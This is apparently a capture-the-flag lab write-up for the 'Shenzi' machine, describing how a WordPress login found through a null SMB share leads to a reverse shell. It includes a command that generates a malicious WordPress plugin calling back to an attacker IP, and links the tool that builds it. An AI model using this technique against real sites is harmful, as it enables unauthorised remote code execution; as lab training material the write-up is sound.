🎫
Shenzi
  • Shenzi
    • Summary
  • Enumeration
    • TCP
    • UDP
    • Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
    • Other Services
      • FTP
      • MSRPC
      • SMB
      • mySQL
  • Exploitation
  • Priv Escalation
Powered by GitBook
On this page

Exploitation

PreviousmySQLNextPriv Escalation

Last updated 2 years ago

After trying to find any vulnerable services, I tried to find some sort of wordpress, webdav, phpmyadmin to get a shell.

Unfortunately I was unable to find anything until i tried a directory with the name of the box.

The directory /shenzi/ led me to a wordpress site which the only thing I had to do was type wp-login/php with the password that I got from the NULL SMB share.

All i needed to do was follow the steps from the Sandbox network from the OSCP labs and I would get a reverse shell.

We generate a reverse shell using this github repo.

python wordpwn.py <reverseip> 443 Y

All we have to do is upload the zip file and install it as a plugin and navigate to it and we will get a reverse shell.

Navigate to the file.

Andddd RCE.

😂
GitHub - wetw0rk/malicious-wordpress-plugin: Simply generates a wordpress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as msfvenom is used to generate the payload.GitHub
Logo